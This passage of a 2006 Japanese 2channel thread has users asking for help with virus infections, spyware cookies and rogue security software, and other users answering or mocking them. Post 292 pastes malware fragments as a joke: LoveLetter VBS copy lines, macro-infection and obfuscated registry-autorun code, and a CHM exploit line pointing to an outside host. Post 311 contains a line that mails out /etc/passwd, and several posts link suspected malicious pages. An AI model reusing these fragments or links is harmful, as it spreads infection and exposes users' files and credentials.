調べてみたんですが、有用な情報が得られなかったので・・・


195 :Y.N:2006/03/19(日) 17:03:28
>>193
俺はアクセス出来るように変更できたけと゛・・・

196 :名無しさん@お腹いっぱい。:2006/03/20(月) 00:24:10
今日は一度も侵入警告でていません。
他の方はどうですか?

197 :& ◆HNg5m/tico :2006/03/20(月) 00:52:51
http://dentu-tarou.hp.infoseek.co.jp/index-101.html
↑これ使って報復をw


198 :名無しさん@お腹いっぱい。:2006/03/20(月) 01:15:34
テンプレ無視で申し訳ないんですが
譲ってもらったパソコンがウィルスに感染していて、ネットに接続すると
広告(?)がポップアップします。
なんとかウィルスがあるファイルを見つけたのですが
ファイルが使用中 みたいな感じのメッセージがでて
ファイルを消すことが出来ません。
どうしたら良いでしょうか?

199 :名無しさん@お腹いっぱい。:2006/03/20(月) 01:29:21
>>198
せーふもーど

200 :名無しさん@お腹いっぱい。:2006/03/20(月) 01:54:18
>>198
テンプラくらい か か な い か ?

201 :189:2006/03/20(月) 02:27:49
>>192
>>193
すみません。実を言うとwinnyのdownフォルダのなかのものなんです。
winnyで落とした漫画の書庫ファイルを解凍したものです。
最近は「アクセスが拒否」となるのがウィルスでないかと気になってwinnyはやっていませんが
やっていたときにはantinnyなどが圧縮ファイルのなかに.exeで入っていたりしていました。
それらはノートンの常駐保護で削除されていたのですが、このファイルはノートンが特に反応しませんでした。

202 :名無しさん@お腹いっぱい。:2006/03/20(月) 03:12:40
>>201
これっぽい・・・><

ローカルドライブを全公開、Winny流出させる新たなウイルス「Exponny」
ttp://internet.watch.impress.co.jp/cda/news/2006/03/17/11304.html

 Exponnyが実行されると「C:\Program Files\Winny2\Down\期間限定にアクセスできません。アクセスが拒否されました。」
などという日本語の偽メッセージを表示。
次いで、システムフォルダの「drivers」フォルダに自分自身を「host.exe」としてコピーし、
レジストリキーを改竄することでWindowsが起動するたびに実行されるように設定する。

203 :189:2006/03/20(月) 03:19:28
>>202
これかもしれませんね。実はこのトロイの記事を見て不安になったんです。
これが感染しているかどうかはどうやって確かめればいいんでしょうか?

204 :名無しさん@お腹いっぱい。:2006/03/20(月) 03:20:31
>>203
それかなりやばい
とりあえず「山田ウイルス」で検索してみ

205 :202:2006/03/20(月) 03:22:00
これ山田じゃなくて、キンタマでしょ

206 :名無しさん@お腹いっぱい。:2006/03/20(月) 03:30:57
UpFolder.txtを確認

207 :189:2006/03/20(月) 03:33:56
>>206
はい!確認!!
内容は
[midi]
Path=C:\midi
Trip=

これは大丈夫そうです。

208 :名無しさん@お腹いっぱい。:2006/03/20(月) 03:40:21
ノートンは対応してるしスキャンして出てないなら問題ないでしょ

それより、このウイルスってダウソ板でもこの記事が出るまで
ほとんど報告が無かったから不思議

209 :189:2006/03/20(月) 03:46:04
>>208
問題ないんですか。少し安心しました。

210 :名無しさん@お腹いっぱい。:2006/03/20(月) 04:26:41
スキャンはしなよw

211 :名無しさん@お腹いっぱい。:2006/03/20(月) 04:32:06
181です。
おつかれさまです。昨日教えていただいて安心しました。
どうもありがとうございました。

212 :189:2006/03/20(月) 04:37:46
>>210
今日、圧縮ファイルの内部をスキャンにチェック入れて完全ファイルスキャンをやりました

C:\Documents and Settings\(ユーザー名)\Local Settings\Temp\Rar$DR00.094
のなかに問題のファイルと同じ名前でこれもアクセスが拒否となるものがあるのですがこれが原因なんでしょうか?

213 :名無しさん@お腹いっぱい。:2006/03/20(月) 06:26:58
感染してないからわからんが、とりあえず駆除できたんだろ
それで良いではないか〜

214 :名無しさん@お腹いっぱい。:2006/03/20(月) 06:54:25
【ネット】「山田オルタナティブ」拡大 パソコン中身がネット流出[03/17]
http://news19.2ch.net/test/read.cgi/newsplus/1142606486/

【ネット】"パソコンの中身をすべて公開" ウィニー利用者以外も情報流出…新ウイルス「山田オルタナティブ」
http://news19.2ch.net/test/read.cgi/newsplus/1142589519/

【IT】Winnyの設定を変更し、ローカルドライブを全公開するウイルス「Exponny」
http://news19.2ch.net/test/read.cgi/newsplus/1142600557/

215 :名無しさん@お腹いっぱい。:2006/03/20(月) 12:13:32
>>212
temp内のファイルを手動で消してみるよろし。ダメならadministorator権限を持ったユーザーでログインしてアクセス許可変更するよろし。
ダメならプロセス監視してそのファイルにアクセスしてるプログラムをkillするよろし。ダメなら・・・・・・・・・再インスコ(`・ω・´)シャキーン

216 :名無しさん@お腹いっぱい。:2006/03/20(月) 21:47:49
【Winny】金子勇被告、新たなファイル交換ソフト開発・・ウィニー応用し情報流出防ぎやすく
http://news19.2ch.net/test/read.cgi/newsplus/1142846541/

217 :名無しさん@お腹いっぱい。:2006/03/20(月) 21:50:19
ダウソ池

218 :名無しさん@お腹いっぱい。:2006/03/20(月) 22:28:37
皆さんwinnyどうやって手に入れたんですか

ぜひ、おしえてください

219 :189:2006/03/20(月) 22:31:16
>>215
プロセス監視とはどうやればいいんでしょうか?
問題のファイルにアクセスするプログラムを調べることが出来るのですか?

220 :Y.N:2006/03/20(月) 23:36:56
>>218
ググった?

221 :名無しさん@お腹いっぱい。:2006/03/20(月) 23:43:39
>>204
キンタマと山田は別物ですよダンナ
キンタマは主にnyネットワークへの流出
山田はHTTP鯖化して世界に向けてコンニチハ

222 :189:2006/03/21(火) 04:09:08
>>215
削除できました!!
セーフモードでadministratorでログインして所有権を獲得し、tmp内のフォルダともに削除に成功!!
本当にありがとうございました。

ところでこれはトロイとかに感染していたのではないと言うことでいいんでしょうか?
「***の現在のアクセス許可の設定を表示または編集するアクセス許可はありませんが、所有権を所得するか、または監査設定を変更することが出来ます。」
と出て、所有者をadministratorにして削除することが出来たのですが、
セーフモードでadministratorでこのフォルダのアクセス権とかをいじった記憶は全くないんですが・・・

223 :名無しさん@お腹いっぱい。:2006/03/21(火) 05:45:17
http://pc8.2ch.net/test/read.cgi/sec/1115267403/
だれかここの67に助言してあげて><

224 :名無しさん@お腹いっぱい。:2006/03/21(火) 07:50:48
>>222
本当はあんたのアカウントでも削除出来るんだが、起動時にそのウィルスは実行されているから、使用中で削除不可にされている
Administratorで削除出来ないのはあんたが勝手にプライベート設定をしてユーザーフォルダのアクセス権を変更してしまったから

225 :189:2006/03/21(火) 08:17:36
>>224
ということはやはり今もウィルスが実行されている可能性は高いんでしょうか?

226 :名無しさん@お腹いっぱい。:2006/03/21(火) 08:33:54
>>224
Exponnyなのは決定なんだよね?
だったらタスクマネージャでhost.exeを探してみて

227 :189:2006/03/21(火) 08:37:13
>>226
決定じゃないです。
host.exeありません。sys.exeとupdate.exeもありません。

228 :名無しさん@お腹いっぱい。:2006/03/21(火) 09:06:44
ウィルスでもなんでもねーよ

229 :189:2006/03/21(火) 09:14:36
>>228
ですよねー
まあでも少し様子を見てみますね
どうにか入ってるかどうか確かめる方法はないものか・・・

230 :名無しさん@お腹いっぱい。:2006/03/21(火) 14:14:11
>>229
じゃあ何で所有権とアクセス権を書き換えた時にスキャンしなかったんだ?
ウィルスならその時に検出されてわかったのによ

231 :名無しさん@お腹いっぱい。:2006/03/21(火) 15:05:44
うぃにーでZIPファイル落としたんですが
中にキンタマ入ってました。先生が駆除してくれたんですが
このファイルは開かずに捨てる方がいいんでしょうか?

232 :名無しさん@お腹いっぱい。:2006/03/21(火) 15:15:23
>>231
開け 開け
感染しないと敵を知る事など出来ない

233 :231:2006/03/21(火) 15:28:13
>>232
なるほど!野球も優勝したことだし
パーッと開いてみるかー!

234 :189:2006/03/21(火) 15:50:38
>>230
!?
そうか!ミスったぁorz

235 :名無しさん@お腹いっぱい。:2006/03/21(火) 15:51:06
何を落としたらAntinyに感染するんですか

236 :名無しさん@お腹いっぱい。:2006/03/21(火) 16:34:43
ダウソで聞け

237 :名無しさん@お腹いっぱい。:2006/03/21(火) 21:43:22
ウイルスを造るには何が必要ですか?
ソフトウェアなどで・・・

238 :名無しさん@お腹いっぱい。:2006/03/21(火) 21:44:18
>>237
ベクターでジョークソフトを探しなさい

239 :名無しさん@お腹いっぱい。:2006/03/21(火) 21:46:06
>>237
愛と勇気とほんの少しの遊び心

240 :237:2006/03/21(火) 21:54:12
>>238
それは全く違うジャンルなのでは?
>>239
残念なことに愛と勇気と遊び心はあるのですが、それを実行するための環境がないのです。

241 :名無しさん@お腹いっぱい。:2006/03/21(火) 21:58:52
>>240
ウイルスといってもいろいろあるわけで
とにかく自分のPC潰すくらいn(ry

242 :240:2006/03/21(火) 22:05:29
>>241
俺も色々なウイルスは持っていますが、造ったり編集をする事ができないのです。
あー種類はVBS系が造りたいです。

243 :名無しさん@お腹いっぱい。:2006/03/21(火) 22:05:44
Win32/Tool.TPE.Aというウイルスを検出しました。
しかし、シマンテックやトレンドマイクロのウイルス辞典で調べても、
該当するウイルスはありません。
これはどういうことでしょうか?

NOD32 2.5

244 :名無しさん@お腹いっぱい。:2006/03/21(火) 22:11:05
>>242
ガキはもう寝ろよ

245 :名無しさん@お腹いっぱい。:2006/03/21(火) 22:12:31
>>243
メーカーごとに名称は違うんだからみつかりゃせんだろうな
見つかっても同じものとは限らんし

246 :名無しさん@お腹いっぱい。:2006/03/21(火) 22:12:31
>>243
文中のAとは亜種またはオリジナルです。

247 :名無しさん@お腹いっぱい。:2006/03/21(火) 22:12:55
インターネットしていて、しばらくすると
「○○(Nortonなんとか)が電子メールをチェックします」という
表示が出て、画面がおかしくなるの。
これってウィルスだと思うんだけど、どうしたらいいの?

248 :名無しさん@お腹いっぱい。:2006/03/21(火) 22:15:16
>>244
ガキとは何歳までの範囲を指しますか?

249 :243:2006/03/21(火) 22:16:21
>>245
>メーカーごとに名称は違うんだから

マジっすか!?Σ (゚Д゚;)

250 :240:2006/03/21(火) 22:17:56
ごめんなさい
もう寝ます

251 :名無しさん@お腹いっぱい。:2006/03/21(火) 22:19:18
>>243
使っている対策ソフトのホームページを見ればいい

252 :240:2006/03/21(火) 22:21:32
>>250
なりすましか?オイ貴様ふざけるなよ…

253 :240:2006/03/21(火) 22:22:23
ウザッ

254 :名無しさん@お腹いっぱい。:2006/03/21(火) 22:24:41
>>253
自分の事?
偉いねぇ君

255 :名無しさん@お腹いっぱい。:2006/03/21(火) 22:26:50
本物も偽物も大差ないわ

256 :名無しさん@お腹いっぱい。:2006/03/21(火) 22:29:02
>>255
確かに

257 :240:2006/03/21(火) 22:37:56
もういいです
ここには頭がおかしい人しかいないんですね

最後に
お前らなんてみんな死んじゃえばいいんだ

258 :237:2006/03/21(火) 22:43:55
ちなみにお前何歳?

259 :237:2006/03/21(火) 23:04:09
ボクまだ3ちゃいでちゅ

260 :名無しさん@お腹いっぱい。:2006/03/21(火) 23:06:32
aho

261 :名無しさん@お腹いっぱい。:2006/03/21(火) 23:10:20
−−−−−−−−−−−−−−−−−−−−−−−−−−
俺様用しおり
  ∧_∧   
 ( ・∀・)< 今日はここまで自演した
−−−−−−−−−−−−−−−−−−−−−−−−−−


262 :名無しさん@お腹いっぱい。:2006/03/21(火) 23:12:09
>>259
逝ってヨシ

263 :名無しさん@お腹いっぱい。:2006/03/22(水) 15:32:23
age

264 :名無しさん@お腹いっぱい。:2006/03/22(水) 20:19:09
ここの人は丁寧に教えていただきましたよ

みなさんがんばってください

265 :名無しさん@お腹いっぱい。:2006/03/22(水) 23:09:34
宜しくお願いします。
急にインターネットの速度が落ちました。
ブロードバンドテストをやっても、いつもなら早いほうと診断されるのですが、
今回はかなり遅い方で何らかの障害があると出ました。
何だかパソコンの動作もぎこちない感じがして、攻撃されてるのかと・・・。

ノートンとウイルスバスター最新版での検索では何もウイルスは発見されませんでした。

以前も今回と同じような症状が出た事があります、ICMP UDPがどうのという
問題だったと思いますが、以前は一度HDDをフォーマットしました。

ウイルスバスターのパーソナルファイアーウォールのログを見てみると
UDP TCP ICMPなど良くわかりませんがブロックしてるようです。

これはウイルスが原因なんでしょうか?私の設定が何か悪いんでしょうか?
それともなんらかの攻撃をされてるのでしょうか?
ちなみにWinnyなどの共有ソフトは使っていません。

どなたか心当たりの方何か治す方法を教えて下さい。

266 :名無しさん@お腹いっぱい。:2006/03/22(水) 23:16:14
>>265
>>1嫁。あとFWのログぐらい書け(IPは伏せて)。

267 :265:2006/03/22(水) 23:33:11
>>266
すまそ、焦ってたorz

【使用OS】 WindowsXP
【WindowsUpdateしてるか】やってる
【AntiVirusは何を使っているか】 Norton Internet Security ウイルスバスター
【ちゃんとUpdateしてるか】 やってる
【スキャンした結果(ウイルス名・発見場所)】 無し
【別のオンラインスキャンしたならその結果は】 異常なし
【症状を具体的に、分かる限りすべて書く】
とにかく速度が出ないし、普段出てる速度も出ない。
ブロードバンドテストにて異常と診断される、接続しなおしても
何をやっても遅いし、パソコンの動作も気のせいかも知れないが、ガタつく感じがする。
【何をしたらそんなことになったのか】
昨日からの記憶だが、
1、昨日、アダルトサイトでウイルスをダウンロードし実行してしまったので、HDDをフォーマット
2、今日、OSを再インストールしたが、Windowsアップデート中にウイルスにかかってしまい
設定が終わった後にウイルスバスターで検索したらWORM_RBOT.TFが発見される。
3、WORM_RBOT.TFは削除し、GYAOで動画を見ようと思ったがやたら遅い事に気がつく。
4、ノートンの体験版でウイルスチェック、ウイルスバスターやオンラインスキャンで
ウイルス検索したが、問題なし。
【その他の質問】
特に無し

>>あとFWのログぐらい書け(IPは伏せて)。
どうやれば良いのでしょうか?

268 :名無しさん@お腹いっぱい。:2006/03/23(木) 01:08:47
>>267
あたりめえだ ネットワークワームがインストールするのは主にスパイウェア
よって、感染後にウィルス対策ソフトは検知しないのが多い
作っているやつらも当然先刻承知だ

269 :164:2006/03/23(木) 04:10:46
分かる方よろしくお願いします

270 :名無しさん@お腹いっぱい。:2006/03/23(木) 04:16:19
テンプレ書けよw

271 :名無しさん@お腹いっぱい。:2006/03/23(木) 04:26:33
>>269
>ググッたらどうやらセキュリティソフトの名前らしいのですが

どう検索したのか知らなけどウイルスだよ・・・
削除しなよ

ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DESKJACK.B
ttp://www3.ca.com/securityadvisor/pest/pest.aspx?id=453097679


272 :名無しさん@お腹いっぱい。:2006/03/23(木) 05:48:45
【使用OS】 WindowsXP
【AntiVirusは何を使っているか】 マカフィー
【ちゃんとUpdateしてるか】 してないかも・・
【スキャンした結果(ウイルス名・発見場所)】 無し
【別のオンラインスキャンしたならその結果は】 無し
【症状を具体的に、分かる限りすべて書く】

mixiを見ていたら、なぜか
自分のパソコンのインターネットのキャッシュにあるmixiのgifを開いてしまい、
そのあとキャッシュを削除したら
マカフィーがそのgifを指して、
「Exploit-URLSpoof.gen(トロイの木馬)に感染しているので駆除した」と言ってきました。
自分でも調べてみましたが、マカフィーが間違って検出してしまう事もあるらしいですが
これはそのパターンでしょうか?

mixiを見たこととウィルスとは関係ないですか?
それとこれで個人情報がわかってしまったりするのでしょうか??

よくわからないのでちょっと不安になっています。
どなたかわかる方、宜しくお願いします。

273 :164:2006/03/23(木) 07:13:53
>>271
セキュリティソフトの名前だと思ったのはこれを見たからです。
ttp://www.bravesentry.com/

感染確認方法でXPUPDATE.EXEもWindowsフォルダになかったし
レジストリにも書き換えられたところは無かったです。

ですが、以前はpestpatrolのスキャンででBraveSentry・Key: hkey_classes_root \.key
とでたのですが
hkey_classes_root \.keyにも怪しいものは無かったです。

スキャンで発見したのはこれ一回きりでこれ以降はなにも発見できません。
どういうことなんでしょうか?
スキャンの語検出は無いものを語検出で在るなんてありっこないですよね?


274 :名無しさん@お腹いっぱい。:2006/03/23(木) 07:51:09
>>273
Spyware Warriorに載ってるね
ttp://www.spywarewarrior.com/rogue_anti-spyware.htm

訳すと買うように迫ってくるアドウェアだとさ

もう出てこないって事は駆除したって事じゃない?

275 :名無しさん@お腹いっぱい。:2006/03/23(木) 08:10:40
>>272
ttp://www.mcafee.com/japan/security/virE2003.asp?v=Exploit-URLSpoof
自分で調べたらいいがな

276 :164:2006/03/23(木) 08:34:03
>>274
駆除はした記憶はいないのです・・。
摩訶不思議な症状ですが心配するようなウィルスでもないし
ありがとうございました。

277 :272:2006/03/23(木) 12:59:29
>>275
ありがとうございます。
一応そのへんのページは見たのですが、
まだちょっと不安だったので・・。
このウィルスはアドレスバーの表示とは別のHPに飛ばして
そこで騙されて個人情報を入れると取られるというような仕組みで合ってるでしょうか。
こっちが個人情報を入れない限りはウィルスが勝手に取っていくという事は
ないと思っていいんでしょうか。

278 :びー:2006/03/23(木) 13:19:22
【使用OS】 WindowsXP
【AntiVirusは何を使っているか】NTT西日本のセキュリティ対策ツール?ネット工事の時に薦められたやつ
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 大量で書ききれない…
【症状を具体的に、分かる限りすべて書く】動作が非常に遅くなった。あとインターネットに繋ごうとしても画面ダウンロード中にいきなりデスクトップに戻される。繋げれても海外のサイト(広告?)が急に表示されてまたデスクトップに戻される。初心者です。無知なオイラ助けて…

279 :名無しさん@お腹いっぱい。:2006/03/23(木) 13:25:51
>>278
書ききれない程大量ならリカバリしたほうが早い

280 :名無しさん@お腹いっぱい。:2006/03/23(木) 13:30:58







http://www2.strangeworld.org/uedakana/ 






チェック結果 [過去ログちぇっかぁ]  HTMLソースを表示(view-source:) [飛び先のチェック] [Dan's View Source]
-- 「2006/03/08 17:16」のキャッシュをチェックしています。 --
※このアドレスは危険URLのひとつです。
注意!アラートオープンを発見! (3)
注意!ループタグを発見! (2)
危険!mailtoストームを発見! (410)
危険!FDDアタックを発見!(4)
危険!無限ループを発見! (2)
危険!ニュースストームを発見! (3)
危険!Telnetストームを発見! (3)
ブラクラチェックが終了しました。

※ ジャンプタグを発見しました。(2)
※ このページは自動的にリロードされるようです。
※ windowオープンを発見しました。(1)


[このアドレスの安全度 0%]

281 :名無しさん@お腹いっぱい。:2006/03/23(木) 13:33:41
レス感謝です。ですかね…初心者のオイラにはリカバリの方法もワカラナイ。お店に持ってったほうがいいですよね?

282 :名無しさん@お腹いっぱい。:2006/03/23(木) 13:47:07
>>281
取説くらい読もうよ

283 :名無しさん@お腹いっぱい。:2006/03/23(木) 13:49:02

【使用OS】XP サービスパック2
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ノートン先生2004
【ちゃんとUpdateしてるか】 完璧
【スキャンした結果(ウイルス名・発見場所)】 コンピューターをスキャン
【別のオンラインスキャンしたならその結果は】 脅威は検出されませんでした
【症状を具体的に、分かる限りすべて書く】 CDドライブが勝手に開く
【何をしたらそんなことになったのか】 オンラインゲーム
【これまでにとった措置】
【その他の質問】


284 :びー:2006/03/23(木) 13:51:09
ねぶり回すように読みます!

285 :名無しさん@お腹いっぱい。:2006/03/23(木) 13:57:53
>>283
釣れますか?

286 :名無しさん@お腹いっぱい。:2006/03/23(木) 14:45:25
>>283
>>282


287 :名無しさん@お腹いっぱい。:2006/03/23(木) 15:13:13
  _  ∩
( ゜∀゜)彡 ガンガレ! ガンガレ! 
 ⊂彡
   _
⊂ヽ ゜∀゜)ヽ    ガーンッ!
  `ヽ  ヽ' ))
   ノ   ノ
  し' ⌒J

    _
  ( ゜∀゜) ミ   ガレッ!!!
 γ 二つ つ
  {   (
  ヽ,_)ヽ,_)



    _  Σ
  ( ゜∀゜)    
 γ 二つ つ
Σ{   (
グヽ,_)ヽ,_)
 ギ

288 :名無しさん@お腹いっぱい。:2006/03/23(木) 16:58:27
すんません、2ちゃんの掲示板見てたら、VBS Interalというウィルスに感染
したと、警告があったんですが、駆除方法をおしえていただけませんか?

289 :名無しさん@お腹いっぱい。:2006/03/23(木) 17:19:44
>>288
気にするな

290 :名無しさん@お腹いっぱい。:2006/03/23(木) 17:35:37
>>288
いい加減にしろ

291 :名無しさん@お腹いっぱい。:2006/03/23(木) 18:00:55
>>288
    ∧∧  .∫ ハァ〜…
   /⌒ヽ)─┛   
 〜(___)

292 :kak.hta';ken=wd+'START:2006/03/23(木) 18:08:04
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub

>>288
こうですか?わかりません><

293 :名無しさん@お腹いっぱい。:2006/03/23(木) 20:25:03
>>288
>>7

294 :名無しさん@お腹いっぱい。 :2006/03/23(木) 21:06:49
【使用OS】
XP
【WindowsUpdateしてるか】
はい
【AntiVirusは何を使っているか】
KING SOFT
【ちゃんとUpdateしてるか】
自動アップグレードしてる
【スキャンした結果(ウイルス名・発見場所)】
まだ・・・
【別のオンラインスキャンしたならその結果は】
まだ・・・
【症状を具体的に、分かる限りすべて書く】
電源を落とすと、「dummy video parent」という
プログラムの終了ダイアログがでて、一定時間またされます。
別段ほかの不具合が見つかりませんが、少し気になりました。
(PCが少し重いかなという具合はあるが、これが原因かどうかは・・)
もしやスパイウェアや何かの危険があるかもしれないと思いました。
何か知っていましたら、宜しくお願いします。
【何をしたらそんなことになったのか】
不明。いつからか・・・
【これまでにとった措置】
一切行わず。
【その他の質問】
今完全スキャン中です。

295 :名無しさん@お腹いっぱい。:2006/03/23(木) 21:24:41
【使用OS】winXP
【WindowsUpdateしてるか】してる
【AntiVirusは何を使っているか】BitDefenderとavast
【ちゃんとUpdateしてるか】してる
【スキャンした結果(ウイルス名・発見場所)】なし
【別のオンラインスキャンしたならその結果は】ウイルスバスターでもなし
【症状を具体的に、分かる限りすべて書く】

ソフトを起動してもないのに
ずっと「ぷーぷーぷー ブーブーブー ぷーぷーぷ− ブーブーブー」
とい音が、断続的に鳴り続けている

【何をしたらそんなことになったのか】

雑誌添付CDの圧縮ファイルを多数解凍していた

【これまでにとった措置】
タスクマネージャ等をみてるが、何が原因なのか不明
同じ症状の人いる?

296 :名無しさん@お腹いっぱい。:2006/03/23(木) 21:40:20
>>295 rebootすれば直るんじゃね?

297 :名無しさん@お腹いっぱい。:2006/03/23(木) 22:49:18
>>295
ビープ音を切る

298 :名無しさん@お腹いっぱい。:2006/03/23(木) 22:53:04
スピーカをオフにする

299 :名無しさん@お腹いっぱい。:2006/03/24(金) 01:51:49
心頭滅却する

300 :名無しさん@お腹いっぱい:2006/03/24(金) 10:18:40
【使用OS】Win XP SP2        
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 マカフィー
【ちゃんとUpdateしてるか】してませんでした。

【スキャンした結果(ウイルス名・発見場所)】
Panda Active Scan でマイコンピュータとローカルディスクを検索しました。以下4つとも駆除不能です。
Spyware:Cookie/Doubleclick
C:\Documents and Settings\Owner\Cookies\owner@doubleclick[1].txt
Spyware:Cookie/2o7
C:\Documents and Settings\Owner\Local Settings\Temp\Cookies\owner@112.2o7[1].txt
Spyware:Cookie/Belnk
C:\Documents and Settings\Owner\Local Settings\Temp\Cookies\owner@belnk[1].txt
Spyware:Cookie/Belnk
C:\Documents and Settings\Owner\Local Settings\Temp\Cookies\owner@dist.belnk[2].txt

【別のオンラインスキャンしたならその結果は】
ウィルスバスターのオンラインスキャンでは検出されず。

【症状を具体的に、分かる限りすべて書く】
2chの他の板で画像がアップされてるというアドレスにすでに何人かが見ていたようなので、
ついクリックしてしまった。クリックしたら、アダルトなサイトが出てきた。
ウィルスだと思い、とりあえず注意を促す書き込みしてスキャン開始しました。
でも、その後他の人?が見たらやっぱり普通に画像が見られてアダルトなサイトになんか行かないぞと言われたり、
これで感染したのか、その前から感染してたのか、よくわかりません。


301 :続きです:2006/03/24(金) 10:19:11
【何をしたらそんなことになったのか】
上に同じ。
【これまでにとった措置】
回線を切りました。リカバリの準備をしています。
【その他の質問】
駆除不能なのでリカバリしようと思いますが、駆除可能でしょうか。
夜1時間から2時間程度ネットするくらいで、普段は回線も電源も切っています。
検索しても英語のサイトしか出てこないのでどういうものなのか理解出来ませんでした。
スパイウェアはPCの情報を盗むと言われますが、パスワードを入れて入るサイトなどここ数日普通に見てました。
最近買い物はしていませんが、Cookieでクレジットの記録が残っていたり、盗まれた可能性はないでしょうか。
駆除後の対処法 パスワードを変更した方がいいなどのアドバイスがあればお願い致します。
長々教えてチャンで申し訳ありません。


302 :名無しさん@お腹いっぱい。:2006/03/24(金) 10:32:55
ただのクッキーだし・・・
スパイウェア駆除ソフトですぐ駆除できるし
ブラウザのオプションからクッキーを削除すればいいだけ
IEならインターネットオプション→全般タブ→Cokkieの削除で終わり

これだけだとわざわざ、パスワードの変更する必要なし

303 :名無しさん@お腹いっぱい。:2006/03/24(金) 10:38:22
>>300
リカバリする前にクッキーとかそういう基本的にな技術について勉強したほうがよい。

304 :名無しさん@お腹いっぱい:2006/03/24(金) 10:43:40
300&301です。
302さん
ありがとうございます。
ただのクッキーなんですか。<スパイウェアが検出されました>って出たので
びっくりしてしまいました。
リカバリするために夜中まで必要なデータ抜き出したり確認したりしてました・・・
そこまでする必要なかったんですね。
パスワードの変更もいらないということで良かったです。
ありがとうございました。


305 :名無しさん@お腹いっぱい。:2006/03/24(金) 10:48:17
>>304
ただのクッキーというか追跡クッキーね
簡単だから削除しても良いと思うよ
今後の為に、スパイウェア除去ソフト入れた方が良いよ

306 :名無しさん@お腹いっぱい。:2006/03/24(金) 11:43:11
>>304
スパイウェア対策ソフトはスキャン結果が0だと商品が売れないからクッキーをわざと表示しうわなにをするふぁwげふぉいあlg

307 :名無しさん@お腹いっぱい。:2006/03/24(金) 12:04:50
ふじこ

308 :300&301&304:2006/03/24(金) 13:03:22
>>303
ありがとうございます。
結果のレポート保存したままこちらに書き込むまで保存先をよく見てませんでした。
txtファイルでしたね・・・
駆除不能と出たので、ものすごいもの仕掛けられたと思ってずっとリカバリと修復ばかり考えて、
試しにクッキー削除してみることも頭にありませんでした。もっと勉強しなおします。

305-306
ありがとうございます。
追跡ですか。気持ちのいいものではないですね。
これを機会に駆除ソフトの導入考えます。ありがとうございました。

>>307
ふじこふじこ言ってすいません。勉強になりました。


309 :名無しさん@お腹いっぱい。:2006/03/24(金) 13:08:12
おまい良い奴だな。

310 :名無しさん@お腹いっぱい。:2006/03/24(金) 13:15:26
無知と良い奴は違う気がする・・・

311 :名無しさん@お腹いっぱい。:2006/03/24(金) 14:09:35
>>268
ウイルス張ったやつ全部運営に報告だろこれ・・・しつこすぎ

すぐ反応しちゃう奴キタ━━cat /etc/passwd | mail nobody━━━ !!


312 :名無しさん@お腹いっぱい。:2006/03/24(金) 14:10:41
>>292 とまちがえ ↑↑

313 :名無しさん@お腹いっぱい。:2006/03/24(金) 17:21:32
p://www.hellplant.org/cgi-bin/xoor/serpent.cgi
これ踏んじゃったんです・・・ いっぱい窓開いて、やばいのか!って思ったらノートンが反応したので、常に遮断をクリック。もっかいでたのでまた遮断。で固まった・・・ここで時間切れで仕事に行かなくてはならなかったので強制終了。
やばいですよね・・・(/_;)これはウィルス?助けて下さい!!

314 :名無しさん@お腹いっぱい。:2006/03/24(金) 18:03:37
ウィルスがはいった圧縮ファイルをマイドキュメントにダウンして解凍した場合、
マイドキュメントからウィルスが全体に広がるのですか?

315 :名無しさん@お腹いっぱい。:2006/03/24(金) 18:16:39
ウイルス置いただけで感染してたらダウンロードなんてできないじゃねーか

316 :名無しさん@お腹いっぱい。:2006/03/24(金) 18:59:27
いや、解凍したらそのファイルから広がるんかなって思って。

317 :名無しさん@お腹いっぱい。:2006/03/24(金) 19:07:17
それじゃあ誰も解凍できねーじゃねーか

318 :名無しさん@お腹いっぱい。:2006/03/24(金) 19:15:38
はじめまして…
先週、初めてwlnnyでダウンロードした んだけど…パソコンが言うこと聞かなくなって…再起動したら、「explorerが原因でOREAUT32 DLL にエラーが発生しました。
explorerは終了します。問題が解決しない場合は、コンピュータを再起動してください。」と出る。キー操作も全く受け付けない…
これってウイルスですか? 誰か同じ経験した人いませんか? 九州在住のオヤジです。良いアドバイスを…(>_<)
ちなみに、Windows Me でウイルスソフトは使ってないです。これはケータイから書き込んでます。


319 :名無しさん@お腹いっぱい。:2006/03/24(金) 19:17:43
だからほいほいダウンしたりするなって事じゃないかな?

320 :名無しさん@お腹いっぱい。:2006/03/24(金) 19:20:03
自業自得

321 :名無しさん@お腹いっぱい。:2006/03/24(金) 19:24:59
だよね。自業自得だよね。やっぱりパソコン買い替えかな? 興味本位でダウンロードしたのは失敗やった。

322 :名無しさん@お腹いっぱい。:2006/03/24(金) 19:26:59
リカバリすればいいんじゃないの?

323 :名無しさん@お腹いっぱい。:2006/03/24(金) 19:35:42
322>>リカバリ??それって、何ですか? でもココでそれを聞いたら板違いって言われるね…
初心者板で聞いてきます。周りにパソコンに詳しい人がいないので…ありがとうございました(^-^)


324 :名無しさん@お腹いっぱい。:2006/03/24(金) 20:30:07
さっきウィルススキャンして大丈夫だからよかったが、もう少し注意するべきだったな。

325 :ヒゲッパ:2006/03/24(金) 21:05:26
ウィルスって初心者でも作れます?

326 :名無しさん@お腹いっぱい。:2006/03/24(金) 21:11:33
>>325
板違い。(・∀・)カエレ!

327 :名無しさん@お腹いっぱい。:2006/03/24(金) 21:19:11
誰か教えて下さい。

OutlookExpress\送信済みアイテム.dbxの中を
Jotti's malware scan 2.99-TRANSITION_TO_3.00-R1 で調べたら
